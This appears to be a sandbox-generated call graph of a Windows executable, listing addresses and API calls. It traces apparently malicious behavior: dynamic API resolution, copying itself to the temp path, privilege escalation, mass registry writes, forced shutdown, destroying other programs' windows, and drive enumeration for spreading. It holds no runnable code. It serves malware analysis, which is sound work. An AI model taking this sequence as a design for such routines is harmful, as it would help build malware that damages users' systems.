29717->29724 29721 413410 lstrcpyA 29718->29721 29722 413410 lstrcpyA 29719->29722 29723 40afbc GetProcAddress 29720->29723 29725 40ac8d GetProcAddress 29721->29725 29726 40aa32 GetProcAddress 29722->29726 29727 413410 lstrcpyA 29723->29727 29728 40b529 LoadLibraryA 29724->29728 29729 413410 lstrcpyA 29725->29729 29730 413410 lstrcpyA 29726->29730 29731 40afdb GetProcAddress 29727->29731 29732 40ba33 GetLastError 29728->29732 29733 40b53d 29728->29733 29734 40acac GetProcAddress 29729->29734 29735 40aa51 GetProcAddress 29730->29735 29736 413410 lstrcpyA 29731->29736 29737 40ba3e 29732->29737 29738 413410 lstrcpyA 29733->29738 29739 413410 lstrcpyA 29734->29739 29740 413410 lstrcpyA 29735->29740 29741 40affa GetProcAddress 29736->29741 29747 413410 lstrcpyA 29737->29747 29742 40b550 GetProcAddress 29738->29742 29743 40accb GetProcAddress 29739->29743 29744 40aa70 GetProcAddress 29740->29744 29745 413410 lstrcpyA 29741->29745 29748 413410 lstrcpyA 29742->29748 29749 413410 lstrcpyA 29743->29749 29750 413410 lstrcpyA 29744->29750 29746 40b019 GetProcAddress 29745->29746 29751 413410 lstrcpyA 29746->29751 29752 40ba5b LoadLibraryA 29747->29752 29753 40b56f GetProcAddress 29748->29753 29754 40acea GetProcAddress 29749->29754 29755 40aa8f GetProcAddress 29750->29755 29758 40b038 GetProcAddress 29751->29758 29759 40bc1a GetLastError 29752->29759 29760 40ba6f 29752->29760 29761 413410 lstrcpyA 29753->29761 29756 413410 lstrcpyA 29754->29756 29757 413410 lstrcpyA 29755->29757 29762 40ad09 GetProcAddress 29756->29762 29763 40aaae GetProcAddress 29757->29763 29764 413410 lstrcpyA 29758->29764 29766 40bc25 29759->29766 29765 413410 lstrcpyA 29760->29765 29767 40b58e GetProcAddress 29761->29767 29768 413410 lstrcpyA 29762->29768 29769 413410 lstrcpyA 29763->29769 29770 40b057 GetProcAddress 29764->29770 29771 40ba82 GetProcAddress 29765->29771 29777 413410 lstrcpyA 29766->29777 29772 413410 lstrcpyA 29767->29772 29773 40ad28 GetProcAddress 29768->29773 29774 40aacd GetProcAddress 29769->29774 29775 413410 lstrcpyA 29770->29775 29776 413410 lstrcpyA 29771->29776 29778 40b5ad GetProcAddress 29772->29778 29779 413410 lstrcpyA 29773->29779 29780 413410 lstrcpyA 29774->29780 29781 40b076 GetProcAddress 29775->29781 29782 40baa1 GetProcAddress 29776->29782 29783 40bc42 LoadLibraryA 29777->29783 29784 413410 lstrcpyA 29778->29784 29786 40ad47 GetProcAddress 29779->29786 29787 40aaec GetProcAddress 29780->29787 29788 413410 lstrcpyA 29781->29788 29789 413410 lstrcpyA 29782->29789 29790 40bc56 29783->29790 29791 40bd3a GetLastError 29783->29791 29785 40b5cc GetProcAddress 29784->29785 29793 413410 lstrcpyA 29785->29793 29795 40ad5b 29786->29795 29796 413410 lstrcpyA 29787->29796 29797 40b095 GetProcAddress 29788->29797 29798 40bac0 GetProcAddress 29789->29798 29792 413410 lstrcpyA 29790->29792 29794 40bd45 29791->29794 29799 40bc69 GetProcAddress 29792->29799 29800 40b5eb GetProcAddress 29793->29800 29808 413410 lstrcpyA 29794->29808 29804 413410 lstrcpyA 29795->29804 29801 40ab0b GetProcAddress 29796->29801 29802 413410 lstrcpyA 29797->29802 29803 413410 lstrcpyA 29798->29803 29806 413410 lstrcpyA 29799->29806 29807 413410 lstrcpyA 29800->29807 29809 413410 lstrcpyA 29801->29809 29810 40b0b4 GetProcAddress 29802->29810 29805 40badf GetProcAddress 29803->29805 29811 40adb4 GetProcAddress 29804->29811 29812 413410 lstrcpyA 29805->29812 29813 40bc88 GetProcAddress 29806->29813 29814 40b60a GetProcAddress 29807->29814 29815 40bd62 LoadLibraryA 29808->29815 29816 40ab2a GetProcAddress 29809->29816 29817 413410 lstrcpyA 29810->29817 29818 413410 lstrcpyA 29811->29818 29819 40bafe GetProcAddress 29812->29819 29820 413410 lstrcpyA 29813->29820 29821 413410 lstrcpyA 29814->29821 29822 40bd72 29815->29822 29823 40bdbe GetLastError 29815->29823 29824 413410 lstrcpyA 29816->29824 29825 40b0d3 GetProcAddress 29817->29825 29826 40add3 GetProcAddress 29818->29826 29827 413410 lstrcpyA 29819->29827 29828 40bca7 GetProcAddress 29820->29828 29829 40b629 GetProcAddress 29821->29829 29830 413410 lstrcpyA 29822->29830 29832 40bdc9 29823->29832 29831 40ab49 GetProcAddress 29824->29831 29870 40b0e7 29825->29870 29833 413410 lstrcpyA 29826->29833 29834 40bb1d GetProcAddress 29827->29834 29835 413410 lstrcpyA 29828->29835 29836 413410 lstrcpyA 29829->29836 29837 40bd85 GetProcAddress 29830->29837 29869 40ab5d 29831->29869 29838 413410 lstrcpyA 29832->29838 29839 40adf2 GetProcAddress 29833->29839 29840 413410 lstrcpyA 29834->29840 29841 40bcc6 GetProcAddress 29835->29841 29843 40b648 GetProcAddress 29836->29843 29844 413410 lstrcpyA 29837->29844 29845 40bde6 LoadLibraryA 29838->29845 29846 413410 lstrcpyA 29839->29846 29847 40bb3c GetProcAddress 29840->29847 29848 413410 lstrcpyA 29841->29848 29842 413410 lstrcpyA 29849 40b140 GetProcAddress 29842->29849 29851 413410 lstrcpyA 29843->29851 29852 40bda4 GetProcAddress 29844->29852 29853 40beb3 GetLastError 29845->29853 29854 40bdfa 29845->29854 29855 40ae11 GetProcAddress 29846->29855 29856 413410 lstrcpyA 29847->29856 29857 40bce5 GetProcAddress 29848->29857 29858 413410 lstrcpyA 29849->29858 29850 413410 lstrcpyA 29859 40abca GetProcAddress 29850->29859 29860 40b667 GetProcAddress 29851->29860 29852->29832 29868 40bdb8 29852->29868 29871 40bebe 29853->29871 29861 413410 lstrcpyA 29854->29861 29862 40ae25 29855->29862 29863 40bb5b GetProcAddress 29856->29863 29864 413410 lstrcpyA 29857->29864 29865 40b15f GetProcAddress 29858->29865 29859->29693 29866 40abda 29859->29866 29867 413410 lstrcpyA 29860->29867 29872 40be0d GetProcAddress 29861->29872 29881 413410 lstrcpyA 29862->29881 29873 413410 lstrcpyA 29863->29873 29874 40bd04 GetProcAddress 29864->29874 29875 413410 lstrcpyA 29865->29875 29866->29693 29876 40b686 GetProcAddress 29867->29876 29868->29832 29869->29850 29870->29842 29877 413410 lstrcpyA 29871->29877 29878 413410 lstrcpyA 29872->29878 29879 40bb7a GetProcAddress 29873->29879 29874->29794 29902 40bd18 29874->29902 29880 40b17e GetProcAddress 29875->29880 29882 413410 lstrcpyA 29876->29882 29883 40bedb LoadLibraryA 29877->29883 29884 40be2c GetProcAddress 29878->29884 29885 413410 lstrcpyA 29879->29885 29886 413410 lstrcpyA 29880->29886 29887 40ae56 GetProcAddress 29881->29887 29888 40b6a5 GetProcAddress 29882->29888 29889 40bf3a GetLastError 29883->29889 29890 40beee 29883->29890 29891 413410 lstrcpyA 29884->29891 29892 40bb99 GetProcAddress 29885->29892 29893 40b19d GetProcAddress 29886->29893 29894 413410 lstrcpyA 29887->29894 29895 413410 lstrcpyA 29888->29895 29900 40bf45 29889->29900 29898 413410 lstrcpyA 29890->29898 29899 40be4b GetProcAddress 29891->29899 29901 413410 lstrcpyA 29892->29901 29903 413410 lstrcpyA 29893->29903 29896 40ae75 GetProcAddress 29894->29896 29897 40b6c4 GetProcAddress 29895->29897 29905 413410 lstrcpyA 29896->29905 29906 413410 lstrcpyA 29897->29906 29907 40bf01 GetProcAddress 29898->29907 29908 413410 lstrcpyA 29899->29908 29915 413410 lstrcpyA 29900->29915 29909 40bbb8 GetProcAddress 29901->29909 29902->29794 29904 40b1bc GetProcAddress 29903->29904 29910 413410 lstrcpyA 29904->29910 29911 40ae94 GetProcAddress 29905->29911 29912 40b6e3 GetProcAddress 29906->29912 29913 413410 lstrcpyA 29907->29913 29914 40be6a GetProcAddress 29908->29914 29909->29766 29959 40bbcc 29909->29959 29917 40b1db GetProcAddress 29910->29917 29918 413410 lstrcpyA 29911->29918 29919 413410 lstrcpyA 29912->29919 29920 40bf22 GetProcAddress 29913->29920 29921 413410 lstrcpyA 29914->29921 29916 40bf62 LoadLibraryA 29915->29916 29922 40bfd2 29916->29922 29923 40bf6f 29916->29923 29924 413410 lstrcpyA 29917->29924 29925 40aeb3 GetProcAddress 29918->29925 29926 40b702 GetProcAddress 29919->29926 29920->29900 29927 40bf38 29920->29927 29928 40be89 GetProcAddress 29921->29928 29933 413410 lstrcpyA 29922->29933 29929 413410 lstrcpyA 29923->29929 29930 40b1fa GetProcAddress 29924->29930 29931 413410 lstrcpyA 29925->29931 29932 413410 lstrcpyA 29926->29932 29927->29900 29928->29871 29934 40be9d 29928->29934 29935 40bf82 GetProcAddress 29929->29935 29936 413410 lstrcpyA 29930->29936 29937 40aed2 GetProcAddress 29931->29937 29938 40b721 GetProcAddress 29932->29938 29939 40bfe5 LoadLibraryA 29933->29939 29934->29871 29940 413410 lstrcpyA 29935->29940 29941 40b219 GetProcAddress 29936->29941 29942 413410 lstrcpyA 29937->29942 29943 413410 lstrcpyA 29938->29943 29944 40c010 29939->29944 29945 40bff1 29939->29945 29946 40bfa3 GetProcAddress 29940->29946 29947 40b22d 29941->29947 29948 40aef1 GetProcAddress 29942->29948 29949 40b740 GetProcAddress 29943->29949 30029 40d7d0 GetModuleFileNameA GetTempPathA lstrcatA 29944->30029 29950 413410 lstrcpyA 29945->29950 29951 413410 lstrcpyA 29946->29951 29958 413410 lstrcpyA 29947->29958 29952 413410 lstrcpyA 29948->29952 29953 413410 lstrcpyA 29949->29953 29954 40c004 GetProcAddress 29950->29954 29955 40bfc4 GetProcAddress 29951->29955 29956 40af10 GetProcAddress 29952->29956 29957 40b75f GetProcAddress 29953->29957 29954->29944 29955->29922 29960 413410 lstrcpyA 29956->29960 29961 413410 lstrcpyA 29957->29961 29962 40b262 GetProcAddress 29958->29962 29959->29766 29963 40af2f GetProcAddress 29960->29963 29964 40b77e GetProcAddress 29961->29964 29965 413410 lstrcpyA 29962->29965 29963->29704 29966 40af43 29963->29966 29967 413410 lstrcpyA 29964->29967 29968 40b281 GetProcAddress 29965->29968 29966->29704 29970 40b79d GetProcAddress 29967->29970 29969 413410 lstrcpyA 29968->29969 29971 40b2a0 GetProcAddress 29969->29971 29972 413410 lstrcpyA 29970->29972 29974 413410 lstrcpyA 29971->29974 29973 40b7bc GetProcAddress 29972->29973 29975 413410 lstrcpyA 29973->29975 29976 40b2bf GetProcAddress 29974->29976 29977 40b7db GetProcAddress 29975->29977 29978 413410 lstrcpyA 29976->29978 29979 413410 lstrcpyA 29977->29979 29980 40b2de GetProcAddress 29978->29980 29981 40b7fa GetProcAddress 29979->29981 29982 413410 lstrcpyA 29980->29982 29983 413410 lstrcpyA 29981->29983 29984 40b2fd GetProcAddress 29982->29984 29985 40b819 GetProcAddress 29983->29985 29986 413410 lstrcpyA 29984->29986 29987 413410 lstrcpyA 29985->29987 29988 40b31c GetProcAddress 29986->29988 29989 40b838 GetProcAddress 29987->29989 29990 413410 lstrcpyA 29988->29990 29991 413410 lstrcpyA 29989->29991 29992 40b33b GetProcAddress 29990->29992 29993 40b857 GetProcAddress 29991->29993 29994 413410 lstrcpyA 29992->29994 29995 413410 lstrcpyA 29993->29995 29996 40b35a GetProcAddress 29994->29996 29997 40b876 GetProcAddress 29995->29997 29998 413410 lstrcpyA 29996->29998 29999 413410 lstrcpyA 29997->29999 30000 40b379 GetProcAddress 29998->30000 30002 40b895 GetProcAddress 29999->30002 30001 413410 lstrcpyA 30000->30001 30003 40b398 GetProcAddress 30001->30003 30004 413410 lstrcpyA 30002->30004 30006 413410 lstrcpyA 30003->30006 30005 40b8b4 GetProcAddress 30004->30005 30007 413410 lstrcpyA 30005->30007 30008 40b3b7 GetProcAddress 30006->30008 30009 40b8d3 GetProcAddress 30007->30009 30010 413410 lstrcpyA 30008->30010 30011 413410 lstrcpyA 30009->30011 30012 40b3d6 GetProcAddress 30010->30012 30013 40b8f2 GetProcAddress 30011->30013 30014 413410 lstrcpyA 30012->30014 30015 413410 lstrcpyA 30013->30015 30016 40b3f5 GetProcAddress 30014->30016 30017 40b911 GetProcAddress 30015->30017 30018 413410 lstrcpyA 30016->30018 30017->29737 30019 40b929 30017->30019 30020 40b414 GetProcAddress 30018->30020 30019->29737 30021 413410 lstrcpyA 30020->30021 30022 40b433 GetProcAddress 30021->30022 30023 413410 lstrcpyA 30022->30023 30024 40b452 GetProcAddress 30023->30024 30025 40b466 30024->30025 30026 413410 lstrcpyA 30025->30026 30027 40b4ef GetProcAddress 30026->30027 30027->29717 30028 40b4ff 30027->30028 30028->29717 30030 414bf8 lstrcpyA 30029->30030 30031 40d804 30030->30031 30223 40c018 lstrcpyA 30031->30223 30033 40d80a 30236 40c34f GetCurrentProcess OpenProcessToken 30033->30236 30037 40d819 30249 415c5f 30037->30249 30039 40d81e GetTickCount 30039->29616 30042 413e32 30041->30042 30043 413e09 GetProcAddress 30041->30043 30042->29616 30043->30042 30044 413e1b 30043->30044 30278 413d4d GetCurrentProcess OpenProcessToken 30044->30278 30048 413d4d 7 API calls 30047->30048 30049 413de4 ExitWindowsEx 30048->30049 30049->29616 30051 40d31b lstrcpyA lstrlenA 30050->30051 30052 4136ff lstrlenA 30051->30052 30053 40d344 30052->30053 30054 413663 2 API calls 30053->30054 30055 40d355 lstrcatA 30054->30055 30066 40d366 30055->30066 30056 414ef4 30 API calls 30056->30066 30057 40d412 lstrcpyA lstrlenA 30057->30066 30058 40d39e lstrcpyA lstrlenA 30058->30066 30059 40d373 30285 414787 16 API calls 30059->30285 30286 414787 16 API calls 30059->30286 30287 414787 16 API calls 30059->30287 30061 413663 2 API calls 30064 40d43f lstrcatA 30061->30064 30062 413663 2 API calls 30065 40d3cb lstrcatA 30062->30065 30063 40d379 Sleep 30063->30066 30064->30066 30065->30066 30066->30051 30066->30056 30066->30057 30066->30058 30066->30059 30066->30061 30066->30062 30069 40d498 30066->30069 30069->29622 30212 40c4ce GetComputerNameA 30069->30212 30070 40d45f Sleep 30070->30066 30071 40d3eb Sleep 30071->30066 30073 41040c 29 API calls 30072->30073 30074 410b6b 30073->30074 30075 410bbc 30074->30075 30077 410b89 30074->30077 30083 410b8e 30074->30083 30296 4100d0 GetTickCount 30075->30296 30294 4100d0 GetTickCount 30077->30294 30080 410c3b 2 API calls 30084 410bb2 30080->30084 30081 410bd8 30085 410a09 31 API calls 30081->30085 30082 410bdd 30082->29613 30083->30080 30295 40ffcb GetTickCount 30084->30295 30085->30082 30087 410bba LeaveCriticalSection 30087->30081 30087->30082 30089 40d16a 30088->30089 30098 40d1ca 30088->30098 30089->30098 30297 40d09a lstrlenA 30089->30297 30090 40d09a 23 API calls 30092 40d1d5 30090->30092 30099 40c7e0 GetTickCount 30092->30099 30094 40d195 lstrlenA 30095 40d1ac lstrcatA 30094->30095 30096 40d1be 30094->30096 30095->30096 30097 40d09a 23 API calls 30096->30097 30097->30098 30098->30090 30100 40c81e 30099->30100 30101 40cd87 lstrcpyA lstrlenA 30100->30101 30103 413410 lstrcpyA 30100->30103 30104 40cdb4 Sleep 30101->30104 30105 40c85a lstrcpyA 30103->30105 30106 413410 lstrcpyA 30104->30106 30107 413410 lstrcpyA 30105->30107 30108 40cdd9 RegCreateKeyExA 30106->30108 30109 40c88c RegCreateKeyExA lstrlenA RegSetValueExA RegCloseKey Sleep 30107->30109 30111 4136ff lstrlenA 30108->30111 30110 413410 lstrcpyA 30109->30110 30112 40c8f1 RegCreateKeyExA 30110->30112 30113 40cded 30111->30113 30114 4136ff lstrlenA 30112->30114 30115 413663 2 API calls 30113->30115 30116 40c905 30114->30116 30117 40ce04 30115->30117 30118 413663 2 API calls 30116->30118 30119 40c7b4 3 API calls 30117->30119 30120 40c91c 30118->30120 30121 40ce0c lstrlenA RegSetValueExA RegCloseKey Sleep 30119->30121 30322 40c7b4 30120->30322 30123 413410 lstrcpyA 30121->30123 30125 40ce61 RegCreateKeyExA 30123->30125 30124 40c928 lstrlenA RegSetValueExA RegCloseKey Sleep 30126 413410 lstrcpyA 30124->30126 30127 4136ff lstrlenA 30125->30127 30128 40c97d RegCreateKeyExA 30126->30128 30129 40ce75 30127->30129 30131 4136ff lstrlenA 30128->30131 30130 413663 2 API calls 30129->30130 30132 40ce8c 30130->30132 30133 40c991 30131->30133 30134 40c7b4 3 API calls 30132->30134 30135 413663 2 API calls 30133->30135 30136 40ce94 lstrcatA lstrlenA RegSetValueExA RegCloseKey Sleep 30134->30136 30137 40c9a8 30135->30137 30136->29624 30138 40c7b4 3 API calls 30137->30138 30139 40c9b4 6 API calls 30138->30139 30140 413410 lstrcpyA 30139->30140 30141 40ca1f RegCreateKeyExA 30140->30141 30142 4136ff lstrlenA 30141->30142 30143 40ca33 30142->30143 30144 413663 2 API calls 30143->30144 30145 40ca4a 30144->30145 30146 40c7b4 3 API calls 30145->30146 30147 40ca56 lstrlenA RegSetValueExA RegCloseKey Sleep 30146->30147 30148 413410 lstrcpyA 30147->30148 30149 40caab RegCreateKeyExA 30148->30149 30150 4136ff lstrlenA 30149->30150 30151 40cabf 30150->30151 30152 413663 2 API calls 30151->30152 30153 40cad6 30152->30153 30154 40c7b4 3 API calls 30153->30154 30155 40cae2 lstrlenA RegSetValueExA RegCloseKey Sleep 30154->30155 30156 413410 lstrcpyA 30155->30156 30157 40cb37 RegCreateKeyExA 30156->30157 30158 4136ff lstrlenA 30157->30158 30159 40cb4b 30158->30159 30160 413663 2 API calls 30159->30160 30161 40cb62 30160->30161 30162 40c7b4 3 API calls 30161->30162 30163 40cb6e 7 API calls 30162->30163 30164 413410 lstrcpyA 30163->30164 30165 40cbfa RegCreateKeyExA 30164->30165 30166 4136ff lstrlenA 30165->30166 30167 40cc0e 30166->30167 30168 413663 2 API calls 30167->30168 30169 40cc24 30168->30169 30170 40c7b4 3 API calls 30169->30170 30171 40cc2c lstrlenA RegSetValueExA RegCloseKey Sleep 30170->30171 30172 413410 lstrcpyA 30171->30172 30173 40cc81 RegCreateKeyExA 30172->30173 30174 4136ff lstrlenA 30173->30174 30175 40cc95 30174->30175 30176 413663 2 API calls 30175->30176 30177 40ccac 30176->30177 30178 40c7b4 3 API calls 30177->30178 30179 40ccb4 lstrcatA lstrlenA RegSetValueExA RegCloseKey Sleep 30178->30179 30180 413410 lstrcpyA 30179->30180 30181 40cd1b RegCreateKeyExA 30180->30181 30182 4136ff lstrlenA 30181->30182 30183 40cd2f 30182->30183 30184 413663 2 API calls 30183->30184 30185 40cd46 30184->30185 30186 40c7b4 3 API calls 30185->30186 30187 40cd4e lstrlenA RegSetValueExA RegCloseKey Sleep 30186->30187 30187->30101 30187->30104 30326 4106f5 30188->30326 30195 40c6fa 30191->30195 30192 413663 2 API calls 30193 40c705 lstrcatA 30192->30193 30369 413a97 GetFileAttributesA 30193->30369 30195->30192 30196 40c73c lstrcpyA lstrlenA 30195->30196 30198 40c7a1 lstrcpyA 30195->30198 30370 401e2a 30195->30370 30203 40c761 30196->30203 30201 40c79f 30198->30201 30199 413663 2 API calls 30200 40c76a lstrcatA 30199->30200 30381 413a97 GetFileAttributesA 30200->30381 30201->29630 30203->30198 30203->30199 30203->30201 30204 401e2a 17 API calls 30203->30204 30204->30203 30206 413775 30205->30206 30209 413820 30205->30209 30207 413792 lstrlenA lstrlenA 30206->30207 30206->30209 30210 4137a9 30207->30210 30208 422536 49 API calls 30208->30210 30209->29580 30210->30208 30210->30209 30211->29607 30397 4135c8 30212->30397 30215 40c540 CloseHandle 30216 40c53c 30215->30216 30216->29622 30218 40c125 GetVolumeInformationA 30217->30218 30219 429b3e 30218->30219 30220 429b51 30219->30220 30220->29673 30221->29680 30222->29676 30224 4136ff lstrlenA 30223->30224 30225 40c034 lstrlenA 30224->30225 30226 413663 2 API calls 30225->30226 30227 40c04c 30226->30227 30258 413e36 GetCurrentProcess OpenProcessToken 30227->30258 30230 4136ff lstrlenA 30231 40c078 lstrlenA 30230->30231 30232 413663 2 API calls 30231->30232 30233 40c08e 30232->30233 30234 413e36 25 API calls 30233->30234 30235 40c094 SetFileAttributesA lstrcatA 30234->30235 30235->30033 30237 40c392 GetTokenInformation CloseHandle 30236->30237 30239 40c38b 30236->30239 30238 40c3c1 AllocateAndInitializeSid 30237->30238 30237->30239 30238->30239 30243 40c3e2 30238->30243 30244 415ead 30239->30244 30240 40c41e FreeSid 30240->30239 30241 40c3fb EqualSid 30241->30243 30242 40c41d 30242->30240 30243->30240 30243->30241 30243->30242 30245 413410 lstrcpyA 30244->30245 30246 415ee0 RegCreateKeyExA 30245->30246 30247 413410 lstrcpyA 30246->30247 30248 415f0b RegSetValueExA RegCloseKey 30247->30248 30248->30037 30250 413410 lstrcpyA 30249->30250 30251 415c9a RegOpenKeyExA 30250->30251 30252 415cb1 30251->30252 30253 415cad 30251->30253 30254 413410 lstrcpyA 30252->30254 30253->30039 30255 415cd2 RegQueryValueExA 30254->30255 30256 415ce6 RegCloseKey 30255->30256 30257 415cee RegCloseKey 30255->30257 30256->30253 30257->30039 30259 413e67 GetTokenInformation GetLastError 30258->30259 30260 413e5c GetLastError 30258->30260 30262 413e91 30259->30262 30263 413e88 GetLastError 30259->30263 30261 40c052 SetFileAttributesA lstrcatA lstrcpyA 30260->30261 30261->30230 30265 410bf4 4 API calls 30262->30265 30264 413f74 CloseHandle SetFileAttributesA 30263->30264 30264->30261 30266 413e9a GetTokenInformation 30265->30266 30267 413f55 GetLastError 30266->30267 30268 413eb7 GetLengthSid 30266->30268 30269 413f63 30267->30269 30270 413f5d 30267->30270 30271 410bf4 4 API calls 30268->30271 30269->30264 30274 410c3b 2 API calls 30269->30274 30272 410c3b 2 API calls 30270->30272 30273 413ecb InitializeAcl 30271->30273 30272->30269 30273->30267 30275 413edf AddAccessAllowedAce 30273->30275 30276 413f73 30274->30276 30275->30267 30277 413ef5 6 API calls 30275->30277 30276->30264 30277->30267 30279 413d85 30278->30279 30280 413d6d GetCurrentThread OpenThreadToken 30278->30280 30281 413d91 LookupPrivilegeValueA 30279->30281 30282 413d8d 30279->30282 30280->30279 30283 413da3 AdjustTokenPrivileges 30281->30283 30284 413dca CloseHandle 30281->30284 30282->29616 30283->30284 30284->30282 30285->30063 30288 405fd0 Sleep GetWindowThreadProcessId 30285->30288 30286->30071 30292 405fd0 8 API calls 30286->30292 30287->30070 30293 405fd0 8 API calls 30287->30293 30289 406041 30288->30289 30290 405ffb EnableWindow IsWindowEnabled 30288->30290 30290->30289 30291 40600e ShowWindow PostMessageA SetWindowPos DestroyWindow 30290->30291 30291->30289 30294->30083 30295->30087 30296->30087 30298 40d0bc lstrcpyA lstrlenA 30297->30298 30304 40d153 GetWindowsDirectoryA 30297->30304 30299 40d0f7 30298->30299 30300 413663 2 API calls 30299->30300 30301 40d114 lstrcatA SetFileAttributesA 30300->30301 30305 413bcf 30301->30305 30304->30094 30304->30098 30321 41382b CreateFileA GetFileSize CloseHandle 30305->30321 30307 413bde 30308 410bf4 4 API calls 30307->30308 30319 40d13d SetFileAttributesA 30307->30319 30309 413bfb CreateFileA 30308->30309 30310 413c2f CreateFileA 30309->30310 30320 413c94 30309->30320 30311 413c46 30310->30311 30310->30320 30316 413c65 ReadFile 30311->30316 30311->30320 30312 413ca8 CloseHandle 30313 413cad 30312->30313 30314 413cb1 CloseHandle 30313->30314 30315 413cb4 30313->30315 30314->30315 30317 410c3b 2 API calls 30315->30317 30318 413c71 WriteFile 30316->30318 30316->30320 30317->30319 30318->30311 30318->30320 30319->30299 30319->30304 30320->30312 30320->30313 30321->30307 30323 40c7ba 30322->30323 30324 413663 2 API calls 30323->30324 30325 40c7ce lstrcatA 30324->30325 30325->30124 30357 41411e GetTickCount 30326->30357 30328 410736 30329 410bf4 4 API calls 30328->30329 30330 410745 30329->30330 30331 413663 2 API calls 30330->30331 30332 41079f 30331->30332 30358 41a5dd 30332->30358 30334 4107a7 30335 413732 3 API calls 30334->30335 30336 4107b9 30335->30336 30337 4108a0 lstrcpyA lstrcatA 30336->30337 30338 4107ce lstrcpyA lstrcatA 30336->30338 30339 41068a 5 API calls 30337->30339 30362 41068a SetFileAttributesA CreateFileA 30338->30362 30341 4108d0 lstrcpyA 30339->30341 30343 41068a 5 API calls 30341->30343 30346 4108f5 30343->30346 30344 4140ca 4 API calls 30345 41080c lstrcatA 30344->30345 30347 41068a 5 API calls 30345->30347 30348 410c3b 2 API calls 30346->30348 30349 41082d 30347->30349 30350 4108fb LeaveCriticalSection 30348->30350 30351 4140ca 4 API calls 30349->30351 30350->29627 30352 41083b lstrcatA 30351->30352 30353 41068a 5 API calls 30352->30353 30354 41085c GetWindowsDirectoryA lstrcatA lstrcatA 30353->30354 30355 41068a 5 API calls 30354->30355 30356 41089d 30355->30356 30356->30337 30357->30328 30359 41a614 30358->30359 30365 41a3c2 30359->30365 30361 41a638 30361->30334 30363 4106c3 WriteFile CloseHandle SetFileAttributesA 30362->30363 30364 4106ea 30362->30364 30363->30364 30364->30344 30366 41a3d5 30365->30366 30367 41a3e6 lstrcpyA 30366->30367 30368 41a3f5 30366->30368 30367->30368 30368->30361 30369->30195 30382 41382b CreateFileA GetFileSize CloseHandle 30370->30382 30372 401e3f 30373 410bf4 4 API calls 30372->30373 30380 401e4a 30372->30380 30374 401e55 30373->30374 30375 401e5f CreateFileA 30374->30375 30376 401e86 ReadFile CloseHandle 30375->30376 30377 401ea4 30375->30377 30383 401647 30376->30383 30379 410c3b 2 API calls 30377->30379 30379->30380 30380->30195 30381->30203 30382->30372 30384 401661 30383->30384 30387 401665 30383->30387 30384->30377 30385 40167c 30385->30377 30386 410c3b 2 API calls 30386->30385 30387->30385 30388 410bf4 4 API calls 30387->30388 30389 40170b 30387->30389 30394 4017d8 30387->30394 30388->30389 30395 41a7a8 8 API calls 30389->30395 30391 40178b 30396 417549 8 API calls 30391->30396 30393 4017b4 lstrlenA 30393->30394 30394->30386 30395->30391 30396->30393 30398 413410 lstrcpyA 30397->30398 30399 4135ee lstrlenA 30398->30399 30400 40c523 OpenMutexA 30399->30400 30400->30215 30400->30216 30402 40c43c GetCursorPos 30401->30402 30403 40c44b Sleep 30402->30403 30403->30402 30406 40d211 lstrcpyA lstrcatA lstrlenA 30405->30406 30407 40d26c lstrcpyA lstrcatA lstrlenA 30405->30407 30415 40d23c 30406->30415 30414 40d28e 30407->30414 30408 413663 2 API calls 30411 40d249 lstrcatA 30408->30411 30409 413663 2 API calls 30410 40d295 lstrcatA 30409->30410 30425 414d8e CreateFileA 30410->30425 30488 414d8e CreateFileA 30411->30488 30414->30409 30416 40d2b0 GetTickCount 30414->30416 30415->30407 30415->30408 30417 40d2c0 30416->30417 30419 40c7e0 71 API calls 30417->30419 30426 406151 30417->30426 30420 40d2ca GetTickCount 30419->30420 30421 40d2d0 30420->30421 30422 40d2df Sleep 30420->30422 30479 4069aa GetLogicalDriveStringsA 30421->30479 30422->30417 30425->30414 30427 413410 lstrcpyA 30426->30427 30428 406187 RegCreateKeyExA 30427->30428 30429 413410 lstrcpyA 30428->30429 30430 4061b3 RegSetValueExA Sleep RegCloseKey Sleep 30429->30430 30431 413410 lstrcpyA 30430->30431 30432 4061f8 RegCreateKeyExA 30431->30432 30433 413410 lstrcpyA 30432->30433 30434 406228 RegSetValueExA Sleep Sleep 30433->30434 30435 413410 lstrcpyA 30434->30435 30436 40625a RegSetValueExA Sleep 30435->30436 30437 413410 lstrcpyA 30436->30437 30438 406285 RegSetValueExA Sleep 30437->30438 30439 413410 lstrcpyA 30438->30439 30440 4062b0 RegSetValueExA Sleep 30439->30440 30441 413410 lstrcpyA 30440->30441 30442 4062db RegSetValueExA Sleep 30441->30442 30443 413410 lstrcpyA 30442->30443 30444 406306 RegSetValueExA Sleep 30443->30444 30445 413410 lstrcpyA 30444->30445 30446 406331 RegSetValueExA Sleep 30445->30446 30447 413410 lstrcpyA 30446->30447 30448 40635c RegSetValueExA Sleep 30447->30448 30449 413410 lstrcpyA 30448->30449 30450 406387 RegSetValueExA Sleep 30449->30450 30451 413410 lstrcpyA 30450->30451 30452 4063b2 RegSetValueExA RegCloseKey Sleep 30451->30452 30453 413410 lstrcpyA 30452->30453 30454 4063f4 RegCreateKeyExA Sleep 30453->30454 30455 413410 lstrcpyA 30454->30455 30456 406421 RegSetValueExA RegCloseKey Sleep 30455->30456 30457 413410 lstrcpyA 30456->30457 30458 40645c RegCreateKeyExA Sleep 30457->30458 30459 413410 lstrcpyA 30458->30459 30460 406489 RegSetValueExA RegCloseKey Sleep 30459->30460 30461 413410 lstrcpyA 30460->30461 30462 4064cb RegCreateKeyExA 30461->30462 30463 413410 lstrcpyA 30462->30463 30464 4064f4 RegSetValueExA RegCloseKey Sleep 30463->30464 30465 413410 lstrcpyA 30464->30465 30466 406536 RegCreateKeyExA 30465->30466 30467 413410 lstrcpyA 30466->30467 30468 40655f RegSetValueExA Sleep 30467->30468 30469 413410 lstrcpyA 30468->30469 30470 40658a RegSetValueExA Sleep 30469->30470 30471 413410 lstrcpyA 30470->30471 30472 4065b5 RegSetValueExA Sleep 30471->30472 30473 413410 lstrcpyA 30472->30473 30474 4065e0 RegSetValueExA Sleep 30473->30474 30475 413410 lstrcpyA 30474->30475 30476 40660b RegSetValueExA Sleep 30475->30476 30477 413410 lstrcpyA 30476->30477 30478 406636 RegSetValueExA RegCloseKey Sleep 30477->30478 30478->30417 30480 406a42 GetTickCount 30479->30480 30481 4069d5 Sleep 30479->30481 30480->30422 30482 406a32 lstrlenA 30481->30482 30485 4069e6 30481->30485 30482->30480 30482->30481 30483 4069ea lstrcpyA 30489 413a97 GetFileAttributesA 30483->30489 30485->30482 30485->30483 30490 413f8e GetCurrentProcess OpenProcessToken 30485->30490 30511 406718 Sleep wsprintfA FindFirstFileA 